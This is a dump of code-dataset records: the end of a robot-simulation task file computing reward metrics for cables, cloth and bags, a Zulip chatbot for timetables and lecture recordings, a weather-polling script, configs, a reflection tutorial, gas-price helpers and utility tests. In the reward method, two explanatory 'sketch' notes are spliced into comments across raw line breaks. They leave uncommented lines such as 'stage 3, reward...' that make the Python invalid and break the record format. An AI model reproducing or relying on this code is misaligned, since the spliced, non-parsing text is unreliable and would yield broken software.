cable has to match a target, but where the target is not\n            # necessarily a straight line; for a straight line, we could use\n            # `zone_size` but here it's easier to iterate through all possible\n            # targets. ONLY consider those IDs in `cable_bead_ids`. We don't\n            # need the machinery with poses because `object_points` should be\n            # zero for the beads. We only check if the bead is close to ANY\n            # target. This resolves ambiguity if the cable is reversed, or with\n            # a ring of cables. Depends on a `dist_threshold` radius.\n            # ---------------------------------------------------------------- #\n            dist_threshold = self.radius * 3.5  # 2*radius is too strict.\n            zone_points = 0\n            for bead_id in self.cable_bead_ids:\n                bead_position = p.getBasePositionAndOrientation(bead_id)[0]\n                min_d = float('inf')\n                for key in self.goal['places']:\n                    target_position = self.goal['places'][key][0]\n                    bead_xy = np.array([bead_position[0], bead_position[1]])\n                    target_xy = np.array([target_position[0], target_position[1]])\n                    dist = np.linalg.norm(bead_xy - target_xy)\n                    if dist < min_d:\n                        min_d = dist\n                if min_d < dist_threshold:\n                    zone_points += 1\n\n            total_rewards = zone_points / len(self.cable_bead_ids)\n            reward = total_rewards - self.total_rewards\n            self.total_rewards = total_rewards\n\n            # Helps us see if performance varies based on the target property.\n            extras['nb_sides'] = self.nb_sides\n            extras['nb_beads'] = len(self.cable_bead_ids)\n            extras['nb_zone'] = zone_points\n            extras['delta_reward'] = reward\n            extras['total_rewards'] = total_rewards\n\n        elif self.metric == 'cable-ring':\n            # ---------------------------------------------------------------- #\n            # Measure the convex hull of the area enclosed by the beads in\n            # `self.cable_bead_ids`. Ignore delta rewards because those are\n            # deltas of convex hulls and not easily interpretable. Just look at\n            # `self.total_rewards` at any time and see if it clears a fraction.\n            # ---------------------------------------------------------------- #\n            points = []\n            for bead_id in self.cable_bead_ids:\n                bead_position = p.getBasePositionAndOrientation(bead_id)[0]\n                points.append([bead_position[0], bead_position[1]])\n            points = np.array([[p[0], p[1]] for p in points])\n\n            # In 2D, this returns AREA (hull.area returns perimeter).\n            try:\n                hull = ConvexHull(points)\n                convex_hull_area = hull.volume\n            except scipy.spatial.qhull.QhullError as e:\n                print(e)\n                convex_hull_area = 0\n            total_rewards = convex_hull_area\n            reward = total_rewards - self.total_rewards\n            self.total_rewards = total_rewards\n\n            # `total_rewards` is redundant here but keep for consistency\n            extras['convex_hull_area'] = convex_hull_area\n            extras['best_possible_area'] = self.circle_area\n            extras['fraction'] = convex_hull_area / self.circle_area\n            extras['delta_reward'] = reward\n            extras['total_rewards'] = total_rewards\n\n        elif self.metric == 'cloth-coverage':\n            # ---------------------------------------------------------------- #\n            # Since we have an arbitrary target zone, using the convex hull (as\n            # in our IROS 2020 paper) is insufficient because we might have\n            # flattened the cloth in the wrong area. Use pixel-based coverage.\n            # ---------------------------------------------------------------- #\n            iou, coverage = self.compute_pixel_IoU_coverage()\n\n            # The usual delta-based metrics. 
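(Sketch of the recurring delta pattern used by every metric in this\n            # method: reward_t = total_rewards_t - total_rewards_{t-1}, so the\n            # per-episode sum of the deltas telescopes to the final\n            # total_rewards.)\n            # 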
Using coverage now, but it could be IoU.\n            total_rewards = coverage\n            reward = total_rewards - self.total_rewards\n            self.total_rewards = total_rewards\n\n            extras['cloth_IoU'] = iou\n            extras['cloth_coverage'] = coverage\n            extras['reward'] = reward\n            extras['total_rewards'] = total_rewards\n\n        elif self.metric == 'cloth-cover-item':\n            # ---------------------------------------------------------------- #\n            # Cover an item with cloth. Current solution: get object mask and\n            # see if the item is there. Additional sanity check: that the item\n            # is actually within some distance from the cloth, otherwise it\n            # could have fallen outside the workspace.\n            # ---------------------------------------------------------------- #\n            _, vert_pos_l = p.getMeshData(bodyUniqueId=self.cloth_id)\n            corner_idx_np = np.array(self.corner_indices)\n            vertpos_xy_np = np.array(vert_pos_l)[:, :2]\n            cloth_center_xy = np.mean(vertpos_xy_np[corner_idx_np], axis=0)\n\n            # Is the cube close to the center of the cloth by a threshold?\n            assert len(self.block_ids) == 1, self.block_ids\n            block_id = self.block_ids[0]\n            block = p.getBasePositionAndOrientation(block_id)[0]\n            dist_block2cent = np.linalg.norm(block[:2] - cloth_center_xy)\n\n            # Combine the segmentation condition with the distance condition.\n            is_item_covered = self.is_item_covered()\n            if dist_block2cent > 0.25:\n                total_rewards = 0\n            else:\n                total_rewards = is_item_covered\n            reward = total_rewards - self.total_rewards\n            self.total_rewards = total_rewards\n\n            extras['dist_block2cent'] = dist_block2cent\n            extras['is_item_covered'] = is_item_covered\n            extras['total_rewards'] = self.total_rewards\n\n        elif self.metric == 'bag-alone-open':\n            # ---------------------------------------------------------------- #\n            # Measure area of the 'bag opening' visible. Given that we're doing\n            # top-down pick and place (instead of 6 DoF) then it probably makes\n            # sense (for now) just to measure the 2D projection of the top ring\n            # vertices to the plane, and get the area from that? TODO(daniel):\n            # include a test for vertex visibility?\n            # ---------------------------------------------------------------- #\n            points = []\n            for bead_id in self.cable_bead_ids:\n                bead_position = p.getBasePositionAndOrientation(bead_id)[0]\n                points.append([bead_position[0], bead_position[1]])\n            points = np.array([[p[0], p[1]] for p in points])\n\n            # In 2D, this returns AREA (hull.area returns perimeter).\n            try:\n                hull = ConvexHull(points)\n                convex_hull_area = hull.volume\n            except scipy.spatial.qhull.QhullError as e:\n                print(e)\n                convex_hull_area = 0\n            total_rewards = convex_hull_area\n            reward = total_rewards - self.total_rewards\n            self.total_rewards = total_rewards\n\n            # `total_rewards` is redundant here but keep for consistency\n            extras['convex_hull_area'] = convex_hull_area\n            extras['best_possible_area'] = self.circle_area\n            extras['fraction'] = convex_hull_area / self.circle_area\n            extras['delta_reward'] = reward\n            extras['total_rewards'] = self.total_rewards\n\n        elif self.metric == 'bag-items':\n            # ---------------------------------------------------------------- #\n            # Ignore rewards in the first two task stages because items might\n            # start in the zone already, or the bag might already be open. 
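(Numeric sketch of the stage-3 weighting computed below: with 3 of 4\n            # items and 30 of 40 beads in the zone, total_rewards would be\n            # 0.5 * (3/4) + 0.5 * (30/40) = 0.75.)\n            # 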
For\n            # stage 3, reward is the percentage of bag beads in the zone, AND if\n            # the cube is in the zone.\n            # ---------------------------------------------------------------- #\n            total_rewards = 0\n\n            def points_in_zone(object_id):\n                # For beads / small cubes, this is a binary test: 'is it in zone?'\n                # Bigger blocks should have multiple points per object.\n                points = self.object_points[object_id]\n                object_pose = p.getBasePositionAndOrientation(object_id)\n                world_to_zone = utils.invert(self.zone_pose)\n                object_to_zone = utils.multiply(world_to_zone, object_pose)\n                points = np.float32(utils.apply(object_to_zone, points))\n                valid_points = np.logical_and.reduce([\n                    points[0, :] > -self.zone_size[0] / 2,\n                    points[0, :] < self.zone_size[0] / 2,\n                    points[1, :] > -self.zone_size[1] / 2,\n                    points[1, :] < self.zone_size[1] / 2, points[2, :] > -0.01,\n                    points[2, :] < self.bounds[2, 1]\n                ]).tolist()\n                return valid_points\n\n            zone_items_rew = 0\n            zone_beads_rew = 0\n\n            if self.task_stage == 3:\n                # 50% weight: items we actually want to be in the zone.\n                zone_items = []\n                for object_id in self.item_ids:\n                    valid_points = points_in_zone(object_id)\n                    zone_items += valid_points\n                zone_items_rew = np.sum(np.array(zone_items)) / len(zone_items)\n                zone_items_rew *= 0.5\n\n                # 50% weight: the cable beads.\n                zone_beads = []\n                for bead_id in self.cable_bead_ids:\n                    valid_points = points_in_zone(bead_id)\n                    zone_beads += valid_points\n                zone_beads_rew = np.sum(np.array(zone_beads)) / len(zone_beads)\n                zone_beads_rew *= 0.5\n\n            # Get total_rewards, then the usual delta and self.total_rewards.\n            total_rewards = zone_items_rew + zone_beads_rew\n            reward = total_rewards - self.total_rewards\n            self.total_rewards = total_rewards\n\n            # Other information to track -- convex hull.\n            _, vert_pos_l = p.getMeshData(bodyUniqueId=self.bag_id)\n            points = [vert_pos_l[i] for i in self.top_ring_idxs]\n            points = np.array([[p[0], p[1]] for p in points])\n            try:\n                hull = ConvexHull(points)\n                convex_hull_area = hull.volume\n            except scipy.spatial.qhull.QhullError as e:\n                print(e)\n                convex_hull_area = 0\n\n            # Track the `self.task_stage`, particularly important for these envs.\n            extras['convex_hull_area'] = convex_hull_area\n            extras['best_possible_area'] = self.circle_area\n            extras['reward'] = reward\n            extras['total_rewards'] = self.total_rewards\n            extras['task_stage'] = self.task_stage\n            extras['zone_items_rew'] = zone_items_rew\n            extras['zone_beads_rew'] = zone_beads_rew\n\n        else:\n            raise NotImplementedError(self.metric)\n\n        return reward, extras\n\n    def done(self):\n        \"\"\"Check if the task is done AND has not failed.\n\n        Returns:\n            True if the episode should be considered a success, used for\n            measuring successes; this is particularly helpful for tasks\n            where one may get successes on the very last time step, e.g., getting\n            the cloth coverage threshold on the last allowed action.\n            However, for bag-items-easy and bag-items-hard (which use the\n            'bag-items' metric), it may be necessary to filter out demos that did\n            not attain sufficiently high reward in external code. 
Currently, this\n is done in `main.py` and its ignore_this_demo() method.\n \"\"\"\n zone_done, defs_done, goal_done = False, False, False\n\n if self.metric == 'zone':\n zone_done = self.total_rewards == 1\n elif self.metric == 'cable-target':\n zone_done = self.total_rewards == 1\n elif self.metric == 'cable-ring':\n defs_done = (self.total_rewards / self.circle_area) >= self.area_thresh\n elif self.metric == 'cloth-coverage':\n defs_done = self.total_rewards >= self.coverage_threshold\n elif self.metric == 'cloth-cover-item':\n defs_done = self.total_rewards == 1\n elif self.metric == 'bag-alone-open':\n defs_done = (self.total_rewards / self.circle_area) >= self.area_thresh\n elif self.metric == 'bag-items':\n defs_done = self.total_rewards > 0\n\n # For tasks with self.metric == 'pose'.\n if hasattr(self, 'goal'):\n goal_done = len(self.goal['steps']) == 0 # pylint: disable=g-explicit-length-test\n return zone_done or defs_done or goal_done\n\n #-------------------------------------------------------------------------\n # Environment Helper Functions\n #-------------------------------------------------------------------------\n\n def fill_template(self, template, replace):\n \"\"\"Read template file and replace string keys.\"\"\"\n filepath = os.path.dirname(os.path.abspath(__file__))\n template = os.path.join(filepath, '..', template)\n with open(template, 'r') as file:\n fdata = file.read()\n for field in replace:\n for i in range(len(replace[field])):\n fdata = fdata.replace(f'{field}{i}', str(replace[field][i]))\n alphabet = string.ascii_lowercase + string.digits\n rname = ''.join(random.choices(alphabet, k=16))\n fname = f'{template}.{rname}'\n with open(fname, 'w') as file:\n file.write(fdata)\n return fname\n\n def random_size(self, min_x, max_x, min_y, max_y, min_z, max_z):\n \"\"\"Get random box size.\"\"\"\n size = np.random.rand(3)\n size[0] = size[0] * (max_x - min_x) + min_x\n size[1] = size[1] * (max_y - min_y) + min_y\n size[2] = size[2] * (max_z - min_z) + min_z\n return tuple(size)\n\n def get_object_masks(self, env):\n \"\"\"Get RGB-D orthographic heightmaps and segmentation masks.\"\"\"\n # TODO(andyzeng): speed this up with direct orthographic projection.\n\n # Capture RGB-D images and segmentation masks.\n color, depth = [], []\n for config in self.camera_config:\n color_t, depth_t, segm_t = env.render(config)\n color_t = np.concatenate((color_t, segm_t[Ellipsis, None]), axis=2)\n color.append(color_t)\n depth.append(depth_t)\n\n # Reconstruct orthographic heightmaps with segmentation masks.\n heightmaps, colormaps = utils.reconstruct_heightmaps(\n color, depth, self.camera_config, self.bounds, self.pixel_size)\n masks = [colormap[Ellipsis, 3:].squeeze() for colormap in colormaps]\n colormaps = np.array(colormaps)[Ellipsis, :3]\n heightmaps = np.array(heightmaps)\n object_masks = np.array(masks)\n\n # Fuse heightmaps from different views.\n valid = np.sum(colormaps, axis=3) > 0\n repeat = np.sum(valid, axis=0)\n repeat[repeat == 0] = 1\n colormap = np.sum(colormaps, axis=0) / repeat[Ellipsis, None]\n colormap = np.uint8(np.round(colormap))\n heightmap = np.max(heightmaps, axis=0)\n # object_mask = np.sum(object_masks, axis=0) / repeat\n object_mask = np.max(object_masks, axis=0)\n\n return colormap, heightmap, object_mask\n\n def random_pose(self, env, object_size):\n \"\"\"Get random collision-free pose in workspace bounds for object.\"\"\"\n plane_id = 1\n max_size = np.sqrt(object_size[0]**2 + object_size[1]**2)\n erode_size = int(np.round(max_size / 
self.pixel_size))\n _, heightmap, object_mask = self.get_object_masks(env)\n\n # Sample freespace regions in workspace.\n mask = np.uint8(object_mask == plane_id)\n mask[0, :], mask[:, 0], mask[-1, :], mask[:, -1] = 0, 0, 0, 0\n mask = cv2.erode(mask, np.ones((erode_size, erode_size), np.uint8))\n if np.sum(mask) == 0:\n return\n pixel = utils.sample_distribution(np.float32(mask))\n position = utils.pixel_to_position(pixel, heightmap, self.bounds,\n self.pixel_size)\n position = (position[0], position[1], object_size[2] / 2)\n rtheta = np.random.rand() * 2 * np.pi\n rotation = utils.get_pybullet_quaternion_from_rot((0, 0, rtheta))\n return position, rotation\n\n def get_object_points(self, object_id):\n object_shape = p.getVisualShapeData(object_id)\n object_dim = object_shape[0][3]\n xv, yv, zv = np.meshgrid(\n np.arange(-object_dim[0] / 2, object_dim[0] / 2, 0.02),\n np.arange(-object_dim[1] / 2, object_dim[1] / 2, 0.02),\n np.arange(-object_dim[2] / 2, object_dim[2] / 2, 0.02),\n sparse=False,\n indexing='xy')\n return np.vstack((xv.reshape(1, -1), yv.reshape(1, -1), zv.reshape(1, -1)))\n\n def color_random_brown(self, object_id):\n shade = np.random.rand() + 0.5\n color = np.float32([shade * 156, shade * 117, shade * 95, 255]) / 255\n p.changeVisualShape(object_id, -1, rgbaColor=color)\n","sub_path":"ravens/ravens/tasks/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":44108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"174365814","text":"import sys\nsys.path.insert(1, 'venv/Lib/site-packages')\nimport zulip\nimport timetable\nimport record\n\n\nBOT_MAIL = \"hse-bot@chat.miem.hse.ru\"\nHSE_API = \"https://www.hse.ru/api/timetable/lessons?\"\n\nHELLO_MESSAGE = '''\nДоброго времени суток!\n\nЯ, Service Bot, cоздан для интеграции Зулипа с некоторыми сервисами МИЭМа\n\nС моей помощью вы можете: \n1) Узнать расписание для себя или другого человека\nЧтобы уточнить список команд для работы с расписанием, отправьте мне сообщение с ключевой фразой \"Помощь расписание\"\n\n2) Отправить запрос на запись занятия\nЧтобы уточнить список команд для работы с расписанием, отправьте мне сообщение с ключевой фразой \"Помощь запись\"\n\n'''\nHELP_RUZ_MESSAGE = '''\nЯ, Service Bot, могу помочь узнавать расписание прямо в диалоге со мной или в стриме, упомянув меня в сообщении \n(через @) :)\n\nСамый быстрый способ - написать мне сообщение с одним только ключевым словом \"Расписание\".\n\nПример: \"Покажи мне расписание\" или просто \"расписание\"\n\nТакой способ показывает положение дел на текущую неделю.\nЕсли нужно конкретнее указать, на какой день или на какой период расписание необходимо, есть несколько способов:\n\n\"Расписание на сегодня\"\n\"Расписание на завтра\"\n\"Расписание на dd.MM.yyyy\" - на день, соответствующий какой-то дате\n\"Расписание на dd.MM.yyyy-dd.MM.yyyy\" - на период\n\"Расписание на среду\" - на какой-то день недели (день недели в винительном падеже :))\n\nТакже, есть возможность узнать расписание приятеля или преподавателя. 
\nНужно всего лишь знать его корпоративную почту и добавить в конец сообщения фразу \"для xxx@edu.hse.ru\".\n\nПример: \"расписание на завтра для msmeladze@hse.ru\"\n\n'''\n\nHELP_NVR_MESSAGE = '''\nЯ, Service Bot, могу помочь получить запись лекции прямо в диалоге со мной или в стриме, упомянув меня в сообщении \n(через @) :)\n\nЧтобы получить список доступных аудиторий, введите команду \"Список аудиторий\"\n\nЧтобы запросить видеозапись занятия, отправьте сообщение с номером аудитории, датой, временем начала и окончания записи, \nа также названием будущей видеозаписи в таком формате: \"запись room_name dd.MM.yyyy hh:mm-hh:mm event_name\". Например,\n\"запись 504 11.09.2020 9:00-10:20 лекция\"\n'''\n\n\nclass BotHandler(object):\n def __init__(self):\n self.client = zulip.Client(config_file=\"zuliprc\")\n\n def get_msg(self, msg):\n if msg[\"sender_email\"] != \"hse-bot@chat.miem.hse.ru\":\n self.check_msg(msg)\n\n def send_msg(self, msg, content):\n if msg[\"type\"] == 'private':\n request = {\n \"type\": \"private\",\n \"to\": msg[\"sender_email\"],\n \"content\": content\n }\n self.client.send_message(request)\n elif msg[\"type\"] == 'stream':\n request = {\n \"type\": \"stream\",\n \"to\": msg[\"display_recipient\"],\n \"topic\": msg[\"subject\"],\n \"content\": content\n }\n self.client.send_message(request)\n\n def send_private_msg(self, email='', content=''):\n request = {\n \"type\": \"private\",\n \"to\": email,\n \"content\": content\n }\n self.client.send_message(request)\n\n def check_msg(self, msg):\n words = msg[\"content\"].lower().split()\n if (msg[\"type\"] == 'private' or '@**Service Bot**' in msg[\"content\"]) \\\n and msg['sender_full_name'] != 'Service Bot':\n if \"помощь\" in words:\n if \"расписание\" in words:\n self.send_msg(msg, HELP_RUZ_MESSAGE)\n elif \"запись\" in words:\n self.send_msg(msg, HELP_NVR_MESSAGE)\n else:\n self.send_msg(msg, HELLO_MESSAGE)\n elif \"расписание\" in words:\n self.send_msg(msg,\n timetable.check_msg(msg[\"sender_email\"], msg[\"content\"], msg[\"sender_id\"]))\n elif \"привет\" in words:\n self.send_msg(msg, HELLO_MESSAGE)\n elif \"запись\" in words:\n self.send_msg(msg,\n record.check_msg(msg[\"sender_email\"], msg[\"content\"]))\n elif \"список\" in words and \"аудиторий\" in words:\n rooms = ', '.join(record.get_rooms())\n self.send_msg(msg, 'Доступные аудитории:\\n' + rooms)\n else:\n self.send_msg(msg, \"Не знаю что и ответить :(. 
\\n\"\n \"Чтобы узнать какие у меня есть команды, напиши 'Помощь'\")\n\n\nif __name__ == '__main__':\n Bot = BotHandler()\n Bot.client.call_on_each_message(Bot.get_msg)\n handler_class = BotHandler\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":6072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"503732750","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport os, time, random\nimport urllib.request\nimport logging\nimport json\nfrom weather_keys import *\nfrom config import *\nimport urllib, json\n\n\nbase_url = \"http://dataservice.accuweather.com/forecasts/v1/daily/1day/\"\nquery = \"?language=en-US&details=true&apikey=\"\n\nclass Config():\n def __init__(self):\n self.weather = {}\n\n \ndef getWeather(config, location):\n\n def FtoC(input):\n return round( ((input - 32) * 5.0/9.0), 0)\n\n #weather_key = \"hogehoge!\"\n #config = Config()\n #config.weather = {}\n config.weather = {}\n url = base_url + str(location) + query + weather_key\n logging.debug(\"Starting getWeather\")\n while True:\n temp = {};\n i = 2; result = None\n t = time.time()\n if os.path.isfile(str(location) + \".json\") and \\\n time.time() - os.path.getmtime(str(location) + \".json\") < WEATHER_INTERVAL:\n logging.debug(str(location) + \": The file already exists!\")\n with open(str(location) + \".json\", 'r') as f:\n result = f.read()\n while not result:\n logging.debug(\"No File found for weather!\")\n try:\n time.sleep(random.randint(2,10))\n result = urllib.request.urlopen(url).read().decode('utf8')\n t = time.time()\n with open (str(location) + \".json\", 'w') as f:\n f.write(result)\n logging.debug(\"Weather info updated!!\")\n except Exception as e:\n logging.debug(\"error occured!: \" + str(e))\n #print(\"error occured!: \" + str(e))\n i = i **2; time.sleep(i)\n #if time.time() - t > 14400: # No update for 4hrs\n # config.weather = {}\n\n \n data = json.loads(result)\n\n # Headline\n temp[\"headline\"] = data[\"Headline\"][\"Text\"]\n temp[\"time\"] = data[\"Headline\"][\"EffectiveDate\"]\n temp[\"time\"] = temp[\"time\"][:-3] + temp[\"time\"][-2:]\n\n # DailyForecasts\n forecasts = data[\"DailyForecasts\"][0]\n\n # - Sun\n data_sun = forecasts[\"Sun\"]\n temp[\"rise\"] = int(data_sun[\"EpochRise\"])\n temp[\"set\"] = int(data_sun[\"EpochSet\"])\n\n # - Temperature\n data_tempe = forecasts[\"Temperature\"]\n # - Minimum\n minf = int(data_tempe[\"Minimum\"][\"Value\"])\n temp[\"min\"] = (minf, FtoC(minf))\n # - Maximum\n maxf = int(data_tempe[\"Maximum\"][\"Value\"])\n temp[\"max\"] = (maxf, FtoC(maxf))\n\n # - RealFeelTemperature\n data_rftempe = forecasts[\"RealFeelTemperature\"]\n # - Minimum\n minf = int(data_rftempe[\"Minimum\"][\"Value\"])\n temp[\"rfmin\"] = (minf, FtoC(minf))\n # - Maximum\n maxf = int(data_rftempe[\"Maximum\"][\"Value\"])\n temp[\"rfmax\"] = (maxf, FtoC(maxf))\n\n # - Day\n data_day = forecasts[\"Day\"]\n temp[\"dicon\"] = data_day[\"Icon\"]\n temp[\"dphrase\"] = data_day[\"LongPhrase\"]\n temp[\"dpreciption\"] = data_day[\"PrecipitationProbability\"]\n \n # - Night\n data_day = forecasts[\"Night\"]\n temp[\"nicon\"] = data_day[\"Icon\"]\n temp[\"nphrase\"] = data_day[\"LongPhrase\"]\n temp[\"npreciption\"] = data_day[\"PrecipitationProbability\"]\n\n # Re-link config.weather\n config.weather[location] = temp \n\n logging.debug(\"weather info updated: \" + str(config.weather))\n\n # Sleep\n time.sleep(WEATHER_INTERVAL)\n #time.sleep(5)\n \nif __name__ == '__main__':\n 
getWeather(Config(), 338668)\n","sub_path":"lib/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"395419692","text":"\"\"\"Copyright 2017 David Donahue. Stores global paths and constants.\"\"\"\nimport os\n\nDATA_DIR = './data'\nCORNELL_MOVIE_DIR = os.path.join(DATA_DIR, 'cornell movie-dialogs corpus/')\n\nCORNELL_MOVIE_LINES_FILE = os.path.join(CORNELL_MOVIE_DIR, 'movie_lines.txt')\nCORNELL_MOVIE_CONVERSATIONS_FILE = os.path.join(CORNELL_MOVIE_DIR, 'movie_conversations.txt')\nMS_MARCO_TRAIN_SET = os.path.join(DATA_DIR, 'ms_marco/train_v1.1.json')\nSQUAD_TRAIN_SET = os.path.join(DATA_DIR, 'squad/train-v1.1.json')\nBASELINE_MODEL_SAVE_DIR = os.path.join(DATA_DIR, 'baseline_models/')\nCHAT_MODEL_SAVE_DIR = os.path.join(DATA_DIR, 'chat_models/')\nGLOVE_200_FILE = os.path.join(DATA_DIR, 'glove.twitter.27B/glove.twitter.27B.200d.txt')\nVALIDATION_PREDICTIONS_FILE = os.path.join(DATA_DIR, 'predictions.pkl')\nSUBMISSION_PREDICTIONS_FILE = os.path.join(DATA_DIR, 'final_predictions.json')\n\n# CONSTANTS\nMAX_QUESTION_WORDS = 30\nMAX_ANSWER_WORDS = 10\nMAX_CONTEXT_WORDS = 200\nGLOVE_EMB_SIZE = 300\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"111729488","text":"# -*- coding: utf-8 -*-\r\n# -*- author: JeremySun -*-\r\n# -*- dating: 20/1/24 -*-\r\n\r\n\"\"\"\r\nAccess an object's attributes through a string\r\n\"\"\"\r\n\r\n\r\nclass People(object):\r\n    def __init__(self, name, age):\r\n        self.name = name\r\n        self.age = age\r\n\r\n    def talk(self):\r\n        print('{name} is talking'.format(name=self.name))\r\n\r\n\r\np = People(name='egon', age=18)\r\n# Access attributes\r\nprint(p.name)\r\nprint(p.talk)\r\n# Map a string to the object's attribute: check whether 'name' exists; True if it does\r\nprint(hasattr(p, 'name'))  # Inspect p.name; essentially p.__dict__['name']\r\n# Fetch an attribute of the object\r\nprint(getattr(p, 'name'))  # a None default means a missing attribute will not raise\r\nprint(getattr(p, 'sex', None))  # returns None if the attribute does not exist\r\n# Modify an attribute\r\nsetattr(p, 'sex', 'male')  # p.sex='male'\r\nprint(p.sex)\r\n# Delete an attribute\r\nprint(p.__dict__)  # {'name': 'egon', 'age': 18, 'sex': 'male'}\r\ndelattr(p, 'age')  # del p.age\r\nprint(p.__dict__)  # {'name': 'egon', 'sex': 'male'}\r\n\r\n# The same works for classes\r\nprint(getattr(People, 'country', None))\r\n\r\n\r\n# An application of reflection\r\nclass Service(object):\r\n    def run(self):\r\n        while True:\r\n            cmd = input('>>: ').strip()  # cmd = 'get a.txt'\r\n            cmds = cmd.split()\r\n            if hasattr(self, cmds[0]):\r\n                func = getattr(self, cmds[0])  # getattr returns a bound method here\r\n                func(cmds)  # add parentheses to call it\r\n\r\n    def get(self, cmds):\r\n        print('get ...', cmds)\r\n\r\n    def put(self, cmds):\r\n        print('put ...', cmds)\r\n\r\n\r\nobj = Service()\r\nobj.run()","sub_path":"Class Learn/24 反射.py","file_name":"24 反射.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"164068369","text":"from brownie import network\nfrom brownie.network.gas.strategies import (\n    GasNowStrategy,\n    ExponentialScalingStrategy,\n    SimpleGasStrategy,\n)\nfrom brownie.network import gas_price\nfrom brownie import Wei\nfrom helpers.network import network_manager\n\nexponential_scaling_config = {\n    \"initial_gas_price\": \"100 gwei\",\n    \"max_gas_price\": \"1000 gwei\",\n}\n\nbsc_static_price = Wei(\"10 gwei\")\n\n\nclass StaticGasStrategy(SimpleGasStrategy):\n    def __init__(self, price) -> None:\n        self.price = price\n        super().__init__()\n\n    def get_gas_price(self) -> 
int:\n return self.price\n\n\nclass GasStrategies:\n def __init__(self):\n self.standard = GasNowStrategy(\"standard\")\n self.fast = GasNowStrategy(\"fast\")\n self.rapid = GasNowStrategy(\"rapid\")\n self.bsc_static = StaticGasStrategy(bsc_static_price)\n\n print(self.fast.get_gas_price())\n\n self.exponentialScaling = ExponentialScalingStrategy(\n initial_gas_price=self.standard.get_gas_price(),\n max_gas_price=Wei(exponential_scaling_config[\"max_gas_price\"]),\n time_duration=120,\n )\n\n self.exponentialScalingFast = ExponentialScalingStrategy(\n initial_gas_price=self.fast.get_gas_price(),\n max_gas_price=Wei(exponential_scaling_config[\"max_gas_price\"]),\n time_duration=60,\n )\n\n def set_default(self, strategy):\n gas_price(strategy)\n\n def set_default_for_active_chain(self):\n chain = network_manager.get_active_network()\n if chain == \"eth\":\n self.set_default(self.exponentialScaling)\n elif chain == \"bsc\":\n self.set_default(self.bsc_static)\n\n\ngas_strategies = GasStrategies()\ngas_strategies.set_default(gas_strategies.fast)\n","sub_path":"helpers/gas_utils.py","file_name":"gas_utils.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"196108475","text":"# -*- coding: utf-8 -*-\n\nfrom enum import Enum\nfrom os import path as osp\nfrom pyuginx import util\nfrom unittest import TestCase\nimport re\nimport textwrap\n\n\nclass UtilTest(TestCase):\n\n def test_is_list(self):\n self.assertTrue(util.is_list([1, 2, 3]))\n self.assertTrue(util.is_list((1, 2, 3)))\n self.assertFalse(util.is_list('123'))\n self.assertFalse(util.is_list(123))\n self.assertFalse(util.is_list(None))\n\n def test_cached_property(self):\n\n class Config(object):\n\n def __init__(self):\n self._app_name = 'pyuginx'\n\n @util.cached_property\n def app_name(self):\n return self._app_name\n\n config = Config()\n self.assertEqual(config.app_name, 'pyuginx')\n config._app_name = 'pyuginx2'\n self.assertEqual(config.app_name, 'pyuginx')\n\n def test_dedent(self):\n ddt = util.dedent('''\n Line 1\n Line 2\n ''')\n dd = textwrap.dedent('''\\\n Line 1\n Line 2''')\n self.assertEqual(dd, ddt)\n\n def test_dedent_newlines(self):\n ddt = util.dedent('''\n\n Line 1\n Line 2\n\n ''')\n dd = textwrap.dedent('''\n Line 1\n Line 2\n ''')\n self.assertEqual(dd, ddt)\n\n def test_format(self):\n template = '''\n Hi {{ first_name }} {{ last_name }}!\n '''\n exp_text = '''\n Hi Foo Bar!\n '''\n text = util.format(template, {'first_name': 'Foo', 'last_name': 'Bar'})\n self.assertEqual(exp_text, text)\n\n def test_format_none_str(self):\n template = '''\n int: {{ int }}\n '''\n exp_text = '''\n int: 100\n '''\n text = util.format(template, {'int': 100})\n self.assertEqual(exp_text, text)\n\n def test_format_no_value(self):\n self.assertRaises(KeyError, util.format, '{{x}}')\n\n def test_format_bad_variable(self):\n text = util.format('{{}} {{ }}')\n self.assertEqual(text, '{{}} {{ }}')\n\n def test_format_preserve_indentation(self):\n template = '''\n def x():\n y(\"\"\"{{a}}\"\"\", \"\"\"{{b}}\"\"\")\n '''\n exp_text = '''\n def x():\n y(\"\"\"one\n two\n three\"\"\", \"\"\"four\n five\n six\"\"\")\n '''\n text = util.format(template, {'a': 'one\\ntwo\\nthree', 'b': 'four\\nfive\\nsix'})\n self.assertEqual(exp_text, text)\n\n def test_parse_command(self):\n cmdlist = ['chmod', '600', 'server.key']\n self.assertEqual(util.parse_command('chmod 600 server.key'), cmdlist)\n self.assertEqual(util.parse_command(cmdlist), cmdlist)\n\n 
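# A round-trip sketch combining the behaviors asserted by the two\n    # neighboring tests; `test_command_roundtrip` is an illustrative\n    # addition, not part of the original suite.\n    def test_command_roundtrip(self):\n        cmdline = 'chmod 600 server.key'\n        self.assertEqual(util.format_command(util.parse_command(cmdline)), cmdline)\n\n    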
